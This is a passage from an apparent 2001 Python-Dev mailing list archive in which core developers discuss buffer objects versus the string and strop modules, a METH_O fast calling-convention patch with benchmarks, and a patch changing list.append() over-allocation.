/usr/include/gdbm/ndbm.h or /usr/include/gdbm-ndbm.h (to use gdbm's ndbm
'emulation') but I gave up in frustration trying to figure out the
difference :P

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From greg at cosc.canterbury.ac.nz  Fri May 25 04:45:01 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 25 May 2001 14:45:01 +1200 (NZST)
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0CE00A.488C8D73@lemburg.com>
Message-ID: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal at lemburg.com>:

> BTW, wouldn't it suffice to add these methods to buffer objects ?
> Then you could write: buffer(ob).find('.').

Aren't buffer objects as they're currently implemented
inherently dangerous?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From martin at loewis.home.cs.tu-berlin.de  Fri May 25 08:00:47 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 25 May 2001 08:00:47 +0200
Subject: [Python-Dev] Special-casing "O"
Message-ID: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>

> Special-casing the snot out of "O" looks like a winner <wink>:

I have a patch on SF that takes this approach:

http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470

The idea is that functions can be declared as METH_O, instead of
METH_VARARGS. I also offer METH_l, but this is currently not used. The
approach could be extended to other signatures, e.g. METH_O_opt_O
(i.e. "O|O").  Some signatures cannot be changed into special-calls,
e.g. "O!", or "ll|l".

In the PyXML test suite, "O" is indeed the most frequent case (72%),
and it is primarily triggered through len (26%), append (24%), and ord
(6%). These are the only functions that make use of the new calling
conventions at the moment. If you look at the patch, you'll see that
it is quite easy to change a method to use a different calling
convention (basically just remove the PyArg_ParseTuple call).

To measure the patch, I use the script

from time import clock

indices = [1] * 20000
indices1 = indices*100
r1 = [1]*60

def doit(case):
    s = clock()
    i = 0
    if case == 0:
        f = ord
        for i in indices1:
            f("o")
    elif case == 1:
        for i in indices:
            l = []
            f = l.append
            for i in r1:
                f(i)
    elif case == 2:
        f = len
        for i in indices1:
            f("o")
    f = clock()
    return f - s

for i in xrange(10):
    print "%.3f %.3f %.3f" % (doit(0),doit(1),doit(2))

Without the patch, (almost) stock CVS gives

2.190 1.800 2.240
2.200 1.800 2.220
2.200 1.800 2.230
2.220 1.800 2.220
2.200 1.800 2.220
2.200 1.790 2.240
2.200 1.790 2.230
2.200 1.800 2.220
2.200 1.800 2.240
2.200 1.790 2.230

With the patch, I get

1.440 1.330 1.460
1.420 1.350 1.440
1.430 1.340 1.430
1.510 1.350 1.460
1.440 1.360 1.470
1.460 1.330 1.450
1.430 1.330 1.420
1.440 1.340 1.440
1.430 1.340 1.430
1.410 1.340 1.450

So the speed-up is roughly 30% to 50%, depending on how much work the
function has to do.

Please let me know what you think.

Regards,
Martin


From mal at lemburg.com  Fri May 25 10:23:10 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 10:23:10 +0200
Subject: [Python-Dev] strop vs. string
References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz>
Message-ID: <3B0E166E.581816AA@lemburg.com>

Greg Ewing wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com>:
> 
> > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > Then you could write: buffer(ob).find('.').
> 
> Aren't buffer objects as they're currently implemented
> inherently dangerous?

Why should they be ?

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Fri May 25 10:56:12 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 10:56:12 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
Message-ID: <3B0E1E2C.4BC121B5@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > Special-casing the snot out of "O" looks like a winner <wink>:
> 
> I have a patch on SF that takes this approach:
> 
> http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470
> 
> The idea is that functions can be declared as METH_O, instead of
> METH_VARARGS. I also offer METH_l, but this is currently not used. The
> approach could be extended to other signatures, e.g. METH_O_opt_O
> (i.e. "O|O").  Some signatures cannot be changed into special-calls,
> e.g. "O!", or "ll|l".
> 
> [benchmark]
> So the speed-up is roughly 30% to 50%, depending on how much work the
> function has to do.
> 
> Please let me know what you think.

Great idea, Martin.

One suggestion though: I would change is the way the
function is "declared" in the method list. Your currently use:

 {"append", (PyCFunction)listappend,  METH_O, append_doc},

Now this would be more flexible if you would implement a scheme
which lets us put the parser string into the method list. The
call mechanism could then easily figure out how to call the
method and it would also be more easily extensible:

 {"append", (PyCFunction)listappend,  METH_DIRECT, append_doc, "O"},

This would then (just like in your patch) call the listappend
function with the parser arguments inlined into the C call:

 listappend(self, arg0)

A parser marker "OO" would then call a method like this:

 method(self, arg0, arg1)

and so on.

This approach costs a little more (the string compare), but
should provide a more direct way of converting existing
functions to the new convention (just copy&paste the PyArg_ParseTuple()
argument) and also allows implementing a generic scheme which
then again relies on PyArg_ParseTuple() to do the argument
parsing, e.g. "is#" could be implemented as:

PyObject *method(PyObject self, int arg0, char *arg1, int *arg1_len)

For optional arguments we'd need some convention which then
lets the called function add the default value as needed.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From ping at lfw.org  Fri May 25 12:56:33 2001
From: ping at lfw.org (Ka-Ping Yee)
Date: Fri, 25 May 2001 05:56:33 -0500 (CDT)
Subject: [Python-Dev] May 25 is Towel Day (towelday.org)
Message-ID: <Pine.LNX.4.10.10105250556050.19548-100000@server1.lfw.org>

If you have enjoyed Douglas Adams' works, please consider carrying
or wearing a towel with you everywhere today, May 25, as a tribute
and in his memory.

For more about Towel Day, visit http://www.towelday.org/.

My apologies for being off-topic.


-- ?!ng


From gstein at lyra.org  Fri May 25 13:59:23 2001
From: gstein at lyra.org (Greg Stein)
Date: Fri, 25 May 2001 04:59:23 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0E166E.581816AA@lemburg.com>; from mal@lemburg.com on Fri, May 25, 2001 at 10:23:10AM +0200
References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> <3B0E166E.581816AA@lemburg.com>
Message-ID: <20010525045923.C12056@lyra.org>

On Fri, May 25, 2001 at 10:23:10AM +0200, M.-A. Lemburg wrote:
> Greg Ewing wrote:
> > "M.-A. Lemburg" <mal at lemburg.com>:
> > 
> > > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > > Then you could write: buffer(ob).find('.').
> > 
> > Aren't buffer objects as they're currently implemented
> > inherently dangerous?
> 
> Why should they be ?

The buffer object caches the pointer from getreadbuffer and friends. If the
target object changes that pointer (internally), then the buffer object's
value is stale.

But that is a bug fix; it is independent of the discussion at hand.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From Barrett at stsci.edu  Fri May 25 15:21:20 2001
From: Barrett at stsci.edu (Paul Barrett)
Date: Fri, 25 May 2001 09:21:20 -0400
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com>
Message-ID: <3B0E5C50.6E365F69@STScI.Edu>

"M.-A. Lemburg" wrote:
> 
> > > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > > Then you could write: buffer(ob).find('.').
> >
> > You're totally missing the point with that suggestion. It does *not*      > > suffice to add them to buffer objects. What about array objects? mmap      > > objects?  Random Joe Object who implements the buffer interface?
> 
> That's the point: you can wrap all those into a buffer object
> and then use the buffer object methods to manipulate them. In
> that sense, buffer objects provide an adaptor to the underlying
> object which implements the needed methods.

Sounds like you are trying to make the buffer object into something it
is not. Not that I have the foggiest idea what it is now, since it
hasn't much use and is badly broken.

I like your idea of sharing functions, I just don't think the buffer
object is the proper means.  I think the buffer object should be
removed from Python and something better put in its place. (I'm not
talking about the buffer C/API, though this could also use an
overhaul, since it doesn't provide enough information to the receiving
method.)

What I think we need is:

1) a malloc object which has a similar interface to the mmap object
with access protection, etc.  This object would be the fundamental way
of getting memory.  The string object would use it to allocate a chunk
of 'read-only' memory.  Other objects would then know not to modify
the contents of the memory.  If you wanted a reference or view of the
memory/buffer, you would get a reference to this object.

2) objects supporting the buffer object should provide a view method
which returns a copy of themselves (and hence all their methods) and
can be used to get a pointer to a subset of its memory.  In this way
the type of memory/buffer being accessed is known compared to the
current buffer object which only indicates the buffer is binary or
char data.  In essence information about how the buffer should be used
is lost in the current buffer C/API.

-- 
Paul Barrett, PhD      Space Telescope Science Institute
Phone: 410-338-4475    ESS/Science Software Group
FAX:   410-338-4767    Baltimore, MD 21218


From guido at digicool.com  Fri May 25 16:29:28 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 25 May 2001 10:29:28 -0400
Subject: [Python-Dev] Vacation
Message-ID: <200105251429.f4PETSd10633@odiug.digicool.com>

I will be on vacation next week without net access.  Back on June 4th!

There's a bunch of stuff that happened on the mailing list that I
expect I won't get to -- I've got to finish up some high priority
work for Digital Creations before I can leave.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Fri May 25 21:06:16 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 25 May 2001 15:06:16 -0400
Subject: [Python-Dev] Time for the yearly list.append() panic
Message-ID: <LNBBLJKPBEHFEDALKOLCIEIEKEAA.tim.one@home.com>

c.l.py has rediscovered the quadratic-time worst-case behavior of list.append().  That is, do list.append(x) in a long
loop.  Linux users don't see anything particularly bad no matter how big the loop.  WinNT eventually displays clear
quadratic-time behavior.  Win9x dies surprisingly early with a MemoryError, despite gobs of memory free:  turns out
Win9x allocates hundreds of virtual heaps, isn't able to coalesce them, and you actually run out of *address space* (the
whole 2GB user space gets fragmented beyond hope).  People on other platforms have reported other bad behaviors over the
years.

I don't want to argue about this again <wink>, I just want to know whether the patch below slows anything down on your
oddball box.  It increases the over-allocation amount in several more layers.  Also replaces integer * and / in the
over-allocation computation by bit operations (integer / in particular is very slow on *some* boxes).

Long-term we should teach PyMalloc about Python's realloc() abuses and craft a cooperative solution.

Index: Objects/listobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/listobject.c,v
retrieving revision 2.92
diff -c -r2.92 listobject.c
*** Objects/listobject.c	2001/02/12 22:06:02	2.92
--- Objects/listobject.c	2001/05/25 19:04:07
***************
*** 9,24 ****
  #include <sys/types.h>		/* For size_t */
  #endif

! #define ROUNDUP(n, PyTryBlock) \
! 	((((n)+(PyTryBlock)-1)/(PyTryBlock))*(PyTryBlock))

  static int
  roundupsize(int n)
  {
! 	if (n < 500)
  		return ROUNDUP(n, 10);
  	else
! 		return ROUNDUP(n, 100);
  }

  #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems))
--- 9,30 ----
  #include <sys/types.h>		/* For size_t */
  #endif

! #define ROUNDUP(n, nbits) \
! 	( ((n) + (1<<(nbits)) - 1) >> (nbits) << (nbits) )

  static int
  roundupsize(int n)
  {
! 	if ((n >> 9) == 0)
! 		return ROUNDUP(n, 3);
! 	else if ((n >> 13) == 0)
! 		return ROUNDUP(n, 7);
! 	else if ((n >> 17) == 0)
  		return ROUNDUP(n, 10);
+ 	else if ((n >> 20) == 0)
+ 		return ROUNDUP(n, 13);
  	else
! 		return ROUNDUP(n, 18);
  }

  #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems))


From martin at loewis.home.cs.tu-berlin.de  Fri May 25 21:51:26 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 25 May 2001 21:51:26 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B0E1E2C.4BC121B5@lemburg.com> (mal@lemburg.com)
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com>
Message-ID: <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>

> Now this would be more flexible if you would implement a scheme
> which lets us put the parser string into the method list. The
> call mechanism could then easily figure out how to call the
> method and it would also be more easily extensible:
> 
>  {"append", (PyCFunction)listappend,  METH_DIRECT, append_doc, "O"},

I'd like to hear other people's comment on this specific issue, so I
guess I should probably write a PEP outlining the options.

My immediate reaction to your proposal is that it only complicates the
interface without any savings. We still can only support a limited
number of calling conventions. E.g. it is not possible to write
portable C code that does all the calling conventions for "l", "ll",
"lll", "llll", and so on - you have to cast the function pointer to
the right prototype, which must be done in source code.

So with this interface, you may end up at run-time finding out that
you cannot support the signature. With the current patch, you'd have
to know to convert "OO" into METH_OO, which I think is not asked too
much - and it gives you a compile-time error if you use an unsupported
calling convention.

> A parser marker "OO" would then call a method like this:
> 
>  method(self, arg0, arg1)
> 
> and so on.

That is indeed the plan, but since you have to code the parameter
combinations in C code, you can only support so many of them.

> allows implementing a generic scheme which
> then again relies on PyArg_ParseTuple() to do the argument
> parsing, e.g. "is#" could be implemented as:

The point of the patch is to get rid of PyArg_ParseTuple in the
"common case". For functions with complex calling conventions, getting
rid of the PyArg_ParseTuple string parsing is not that important,
since they are expensive, anyway (not that "is#" couldn't be
supported, I'd call it METH_is_hash).

> For optional arguments we'd need some convention which then
> lets the called function add the default value as needed.

For the moment, I'd only support "|O", and perhaps "|z"; an omitted
argument would be represented as a NULL pointer. That means that "|i"
couldn't participate in the fast calling convention - unless we
translate that to

void foo(PyObject*self, int i, bool ipresent);

BTW, the most frequent function in my measurements that would make use
of this convention is "OO|i:replace", which scores at 4.5%.

Regards,
Martin


From gstein at lyra.org  Fri May 25 22:27:52 2001
From: gstein at lyra.org (Greg Stein)
Date: Fri, 25 May 2001 13:27:52 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0E5C50.6E365F69@STScI.Edu>; from Barrett@stsci.edu on Fri, May 25, 2001 at 09:21:20AM -0400
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu>
Message-ID: <20010525132752.B5402@lyra.org>

On Fri, May 25, 2001 at 09:21:20AM -0400, Paul Barrett wrote:
> "M.-A. Lemburg" wrote:
> > 
> > > > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > > > Then you could write: buffer(ob).find('.').
> > >
> > > You're totally missing the point with that suggestion. It does *not*      > > suffice to add them to buffer objects. What about array objects? mmap      > > objects?  Random Joe Object who implements the buffer interface?
> > 
> > That's the point: you can wrap all those into a buffer object
> > and then use the buffer object methods to manipulate them. In
> > that sense, buffer objects provide an adaptor to the underlying
> > object which implements the needed methods.
> 
> Sounds like you are trying to make the buffer object into something it
> is not.

The buffer object is intended to provide a Python-level object (with methods
and behavior) for any other object which exports the buffer API (but not
those particular methods/behavior).

It was added for Python 1.5.2, but did not keep up with the methods added to
the string object. Arguably, it is out of date rather than "[turning it
into] something it is not."

> Not that I have the foggiest idea what it is now, since it
> hasn't much use and is badly broken.

"badly" is overstating the problem. It caches a pointer when it shouldn't.
This doesn't work well when using it with array objects or PIL's image
objects. Most objects, it is fine.

The buffer object is also very good for C/Python extensions and embedding
code. It provides a Python-level view on a block of memory. Using a string
object implies making a copy, and it removes the possibility for read/write
access to that memory.

And you state: "Not that I have the foggiest idea what it is now". If so,
then wtf are you making statements about the buffer object's behavior?

> I like your idea of sharing functions, I just don't think the buffer
> object is the proper means.  I think the buffer object should be
> removed from Python and something better put in its place. (I'm not
> talking about the buffer C/API, though this could also use an
> overhaul, since it doesn't provide enough information to the receiving
> method.)
> 
> What I think we need is:
> 
> 1) a malloc object which has a similar interface to the mmap object
> with access protection, etc.  This object would be the fundamental way
> of getting memory.  The string object would use it to allocate a chunk
> of 'read-only' memory.  Other objects would then know not to modify
> the contents of the memory.  If you wanted a reference or view of the
> memory/buffer, you would get a reference to this object.

You're talking about the buffer object that we have *today*.

It can refer to another object (i.e. the memory exposed via the other
object's buffer API), refer to memory, or it can allocate its own memory.
The buffer object can be marked read-only, or read-write.

> 2) objects supporting the buffer object should provide a view method
> which returns a copy of themselves (and hence all their methods) and
> can be used to get a pointer to a subset of its memory.  In this way
> the type of memory/buffer being accessed is known compared to the
> current buffer object which only indicates the buffer is binary or
> char data.  In essence information about how the buffer should be used
> is lost in the current buffer C/API.

I'm not sure that I understand this paragraph.


No... what needs to happen is to have the bug in PyBufferObject fixed. Then
to refactor stringobject.c and stropmodule.c to move all of those
byte-oriented processing functions into a new file such as Python/byteops.c
(whatever; name isn't important). Ideally, stringobject.c and stropmodule.c
would be simple covers over the same functions.

Those functions can then be used by PyBufferObject to implement the rest of
the string methods on itself.


This would leave us at MAL's suggested point: via the buffer object, we can
perform all of the standard string methods/ops on any object that implements
the buffer API.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From mal at lemburg.com  Fri May 25 23:16:32 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 23:16:32 +0200
Subject: [Python-Dev] Time for the yearly list.append() panic
References: <LNBBLJKPBEHFEDALKOLCIEIEKEAA.tim.one@home.com>
Message-ID: <3B0ECBB0.6798F4AB@lemburg.com>

Tim Peters wrote:
> 
> Long-term we should teach PyMalloc about Python's realloc() abuses and craft a cooperative solution.

That's what I think too. There's really not much point in trying
to work around poor malloc() implementations when we've already
got the cure built into Python... I just wish Vladimir would 
resurface again to complete his great work (AFAIK, pymalloc still
has problems with threads).

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Fri May 25 23:38:15 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 23:38:15 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>
Message-ID: <3B0ED0C7.F1A665EA@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > Now this would be more flexible if you would implement a scheme
> > which lets us put the parser string into the method list. The
> > call mechanism could then easily figure out how to call the
> > method and it would also be more easily extensible:
> >
> >  {"append", (PyCFunction)listappend,  METH_DIRECT, append_doc, "O"},
> 
> I'd like to hear other people's comment on this specific issue, so I
> guess I should probably write a PEP outlining the options.
> 
> My immediate reaction to your proposal is that it only complicates the
> interface without any savings. We still can only support a limited
> number of calling conventions. E.g. it is not possible to write
> portable C code that does all the calling conventions for "l", "ll",
> "lll", "llll", and so on - you have to cast the function pointer to
> the right prototype, which must be done in source code.
>
> So with this interface, you may end up at run-time finding out that
> you cannot support the signature. With the current patch, you'd have
> to know to convert "OO" into METH_OO, which I think is not asked too
> much - and it gives you a compile-time error if you use an unsupported
> calling convention.

True. It's unfortunate that C doesn't offer the reverse of
varargs.h...
 
> > A parser marker "OO" would then call a method like this:
> >
> >  method(self, arg0, arg1)
> >
> > and so on.
> 
> That is indeed the plan, but since you have to code the parameter
> combinations in C code, you can only support so many of them.
> 
> > allows implementing a generic scheme which
> > then again relies on PyArg_ParseTuple() to do the argument
> > parsing, e.g. "is#" could be implemented as:
> 
> The point of the patch is to get rid of PyArg_ParseTuple in the
> "common case". For functions with complex calling conventions, getting
> rid of the PyArg_ParseTuple string parsing is not that important,
> since they are expensive, anyway (not that "is#" couldn't be
> supported, I'd call it METH_is_hash).
> 
> > For optional arguments we'd need some convention which then
> > lets the called function add the default value as needed.
> 
> For the moment, I'd only support "|O", and perhaps "|z"; an omitted
> argument would be represented as a NULL pointer. That means that "|i"
> couldn't participate in the fast calling convention - unless we
> translate that to
> 
> void foo(PyObject*self, int i, bool ipresent);
> 
> BTW, the most frequent function in my measurements that would make use
> of this convention is "OO|i:replace", which scores at 4.5%.

I was thinking of using pointer indirection for this:

	foo(PyObject *self, int *i)

If i is given as argument, *i is set to the value, otherwise
i is set to NULL.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one at home.com  Sat May 26 00:11:43 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 25 May 2001 18:11:43 -0400
Subject: [Python-Dev] Time for the yearly list.append() panic
In-Reply-To: <3B0ECBB0.6798F4AB@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEIMKEAA.tim.one@home.com>

[Tim]
> Long-term we should teach PyMalloc about Python's realloc()
> abuses and craft a cooperative solution.

[MAL]
> That's what I think too. There's really not much point in trying
> to work around poor malloc() implementations when we've already
> got the cure built into Python...

The point *here* is that a simple localized patch could kill off a
Frequently Irritating Complaint without further ado:  on my personal
cost/benefit scale, it's all I can *afford* to do now.  PyMalloc likely
won't solve it as-is x-platform, without new work to accommodate extreme
realloc() abuse.

> I just wish Vladimir would resurface again to complete his great
> work

I'd like him to come back even if he doesn't <wink>.

> (AFAIK, pymalloc still has problems with threads).

It has lock macros that haven't been #define'd to do anything yet.  But part
of the potential value of the Python core using its own allocator is to
exploit the global interpreter lock to *not* lock in the allocator.  Messy
issues.  Python should grow a cheaper platform-specific flavor of internal
lock too.  (Jeremy pointed out some code the other day that jumps through
hoops to simulate a reentrant lock on top of a Python lock; an irony is that
on Windows, the native lock *is* reentrant already, and Python jumps through
hoops to make it act as if it weren't <wink>)


From mal at lemburg.com  Sat May 26 00:07:00 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sat, 26 May 2001 00:07:00 +0200
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu> <20010525132752.B5402@lyra.org>
Message-ID: <3B0ED784.FC53D01@lemburg.com>

Greg Stein wrote:
> 
> No... what needs to happen is to have the bug in PyBufferObject fixed. Then
> to refactor stringobject.c and stropmodule.c to move all of those
> byte-oriented processing functions into a new file such as Python/byteops.c
> (whatever; name isn't important). Ideally, stringobject.c and stropmodule.c
> would be simple covers over the same functions.
> 
> Those functions can then be used by PyBufferObject to implement the rest of
> the string methods on itself.
> 
> This would leave us at MAL's suggested point: via the buffer object, we can
> perform all of the standard string methods/ops on any object that implements
> the buffer API.

I wonder how we could achieve this without copy&pasting all
the needed methods from stringobject.c to bufferobject.c....
all the string methods use the string object layout directly
rather than just dealing with a pointer and a length.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From m.favas at per.dem.csiro.au  Sat May 26 04:34:20 2001
From: m.favas at per.dem.csiro.au (Mark Favas)
Date: Sat, 26 May 2001 10:34:20 +0800
Subject: [Python-Dev] Time for the yearly list.append() panic
Message-ID: <3B0F162C.AD16E452@per.dem.csiro.au>

[Tim wants to know whether his patch to listobject.c slows anything down
on anyone's "oddball box"...]

While in no way admitting that mine is an oddball box <wink>, it being a
Tru64 Unix alpha processor machine, I do see a slowdown after applying
the patch (measured on the test suite and on pystone). However, it's
only of the order of 0.5 to 1%.

slightly-oddly y'rs  - Mark

-- 
Mark Favas  -   m.favas at per.dem.csiro.au
CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA


From tim.one at home.com  Sat May 26 06:05:40 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 26 May 2001 00:05:40 -0400
Subject: [Python-Dev] Time for the yearly list.append() panic
In-Reply-To: <3B0F162C.AD16E452@per.dem.csiro.au>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEJAKEAA.tim.one@home.com>

[Mark Favas]
> [Tim wants to know whether his patch to listobject.c slows anything down
> on anyone's "oddball box"...]
>
> While in no way admitting that mine is an oddball box <wink>,

Heh -- of course not.  I had more in mind obscure OSes like Linux <wink>.

> it being a Tru64 Unix alpha processor machine, I do see a slowdown
> after applying the patch (measured on the test suite and on pystone).
> However, it's only of the order of 0.5 to 1%.

Now that's very odd, since Alpha has about the slowest integer divsion on
Earth, and every list append was doing an int div before the patch but not
after.

I'm afraid that timing the test suite before and after is a red herring, as
several of the expensive tests have (pseudo)random components and can do an
amount of work that varies depending on system time at the time random.py is
first imported.

pystone is even odder:  the relevant code in listobject.c is never executed
during pystone!  I suspected that because pystone is an old synthetic Ada
benchmark simulating a pile of integer systems programs, so pystone is
unique among Python programs in not exercising any of Python's useful
features <wink> -- a breakpoint in the debugger just now confirmed it (never
did a list resize after compilation finished).

So I'm pretty sure that after I check it in, you'll see a speedup instead
<wink>.

Get anywhere identifying why your other app is 20% slower (blast from the
past)?


From martin at loewis.home.cs.tu-berlin.de  Sat May 26 07:28:32 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sat, 26 May 2001 07:28:32 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B0ED0C7.F1A665EA@lemburg.com> (mal@lemburg.com)
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com>
Message-ID: <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>

> I was thinking of using pointer indirection for this:
> 
> 	foo(PyObject *self, int *i)
> 
> If i is given as argument, *i is set to the value, otherwise
> i is set to NULL.

That is a good idea; I'll try to update my patch to more calling
conventions.

Regards,
Martin


From tim.one at home.com  Sat May 26 08:44:04 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 26 May 2001 02:44:04 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0ED784.FC53D01@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEJEKEAA.tim.one@home.com>

The buffer object has been neglected for years:  is that because it's in
prime shape, or because nobody cares about it enough to maintain it?  "The
bug" has been known for years without any action taken to address it; the
docs give up in spots and nobody addresses that either (like "The current
policy seems to state that these characters may be multi-byte characters" --
well, yes or no?); the builtin buffer() function isn't called anywhere in
the std test suite; the file object still has an undocumented readinto()
method that just confuses people who bump into it; and it's so obscure in
daily life that it appears Guido didn't even think of it when adding
iterators for the other sequence types.

I expect that answers my question <wink>.  Is someone (Greg? MAL?) going to
champion it now?  That would be cool.

About combining strop and buffers and strings, don't forget unicodeobject.c:
that's got oodles of basically duplicate code too.  /F suggested dealing
with the minor differences via maintaining one code file that gets compiled
multiple times w/ appropriate #defines.


From tim.one at home.com  Sat May 26 10:14:06 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 26 May 2001 04:14:06 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEJHKEAA.tim.one@home.com>

I don't want to see us duplicate the guts of PyArg_ParseTuple() inside
do_call_special().  METH_O is a cool idea, METH_l is marginal, and the new
code is already slower for METH_O than it needs to be in order to support
the *possibility* of METH_l too (stacks and loops and switch stmts and an
extra layer of do_call_special function call "just in case").

Do METH_O, convert every "O" function to use it, declare victory, and enjoy
the weekend <wink>.

1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
    size-ly y'rs  - tim


From m.favas at per.dem.csiro.au  Sat May 26 10:30:29 2001
From: m.favas at per.dem.csiro.au (Mark Favas)
Date: Sat, 26 May 2001 16:30:29 +0800
Subject: [Python-Dev] Time for the yearly list.append() panic
References: <LNBBLJKPBEHFEDALKOLCKEJAKEAA.tim.one@home.com>
Message-ID: <3B0F69A5.6F569573@per.dem.csiro.au>

[Tim tells Mark that his observations reflect more Brownian motion
(pseudo!) than reality...]

> [Mark Favas]
> > it being a Tru64 Unix alpha processor machine, I do see a slowdown
> > after applying the patch (measured on the test suite and on pystone).
> > However, it's only of the order of 0.5 to 1%.
> 
> Now that's very odd, since Alpha has about the slowest integer divsion on
> Earth, and every list append was doing an int div before the patch but not
> after.
> 
> I'm afraid that timing the test suite before and after is a red herring, as
> several of the expensive tests have (pseudo)random components and can do an
> amount of work that varies depending on system time at the time random.py is
> first imported.
> 
> pystone is even odder:  the relevant code in listobject.c is never executed
> during pystone!  I suspected that because pystone is an old synthetic Ada
> benchmark simulating a pile of integer systems programs, so pystone is
> unique among Python programs in not exercising any of Python's useful
> features <wink> -- a breakpoint in the debugger just now confirmed it (never
> did a list resize after compilation finished).
> 
> So I'm pretty sure that after I check it in, you'll see a speedup instead
> <wink>.

OK <grin>: this time, instead of making unwarranted assumptions about
test suites and pystones <wink>, I wrote and ran a test that I _think_
should exercise the code (at least, it does lots of list.append()s),
and, yes, the newly checked-in code's about 3-4% faster compared with
the original version of, well, days ago.

> 
> Get anywhere identifying why your other app is 20% slower (blast from the
> past)?

No, not yet. The profiling results at first eyeball seemed hard to match
up, so I put it off for a rainy weekend. And Perth's drought has just
